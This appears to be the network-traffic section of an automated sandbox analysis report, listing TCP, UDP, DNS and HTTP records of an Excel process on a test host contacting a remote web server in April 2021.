Apr 11, 2021 00:11:44.244446039 CEST | 49165 | 80 | 192.168.2.22 | 104.21.43.238 |
Apr 11, 2021 00:11:44.273181915 CEST | 80 | 49165 | 104.21.43.238 | 192.168.2.22 |
Apr 11, 2021 00:11:44.273291111 CEST | 49165 | 80 | 192.168.2.22 | 104.21.43.238 |
Apr 11, 2021 00:11:44.274460077 CEST | 49165 | 80 | 192.168.2.22 | 104.21.43.238 |
Apr 11, 2021 00:11:44.302973032 CEST | 80 | 49165 | 104.21.43.238 | 192.168.2.22 |
Apr 11, 2021 00:11:44.343449116 CEST | 80 | 49165 | 104.21.43.238 | 192.168.2.22 |
Apr 11, 2021 00:11:44.343504906 CEST | 80 | 49165 | 104.21.43.238 | 192.168.2.22 |
Apr 11, 2021 00:11:44.343533993 CEST | 80 | 49165 | 104.21.43.238 | 192.168.2.22 |
Apr 11, 2021 00:11:44.343570948 CEST | 49165 | 80 | 192.168.2.22 | 104.21.43.238 |
Apr 11, 2021 00:11:44.343597889 CEST | 49165 | 80 | 192.168.2.22 | 104.21.43.238 |
Apr 11, 2021 00:11:44.343604088 CEST | 49165 | 80 | 192.168.2.22 | 104.21.43.238 |
Apr 11, 2021 00:13:44.131885052 CEST | 49165 | 80 | 192.168.2.22 | 104.21.43.238 |
Apr 11, 2021 00:13:44.161051035 CEST | 80 | 49165 | 104.21.43.238 | 192.168.2.22 |
Apr 11, 2021 00:13:44.161395073 CEST | 49165 | 80 | 192.168.2.22 | 104.21.43.238 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 11, 2021 00:11:44.184062958 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 11, 2021 00:11:44.222151041 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 11, 2021 00:11:44.184062958 CEST | 192.168.2.22 | 8.8.8.8 | 0xb648 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 11, 2021 00:11:44.222151041 CEST | 8.8.8.8 | 192.168.2.22 | 0xb648 | No error (0) | 104.21.43.238 | A (IP address) | IN (0x0001) | ||
Apr 11, 2021 00:11:44.222151041 CEST | 8.8.8.8 | 192.168.2.22 | 0xb648 | No error (0) | 172.67.189.4 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 104.21.43.238 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 11, 2021 00:11:44.274460077 CEST | 0 | OUT | |
Apr 11, 2021 00:11:44.343449116 CEST | 2 | IN |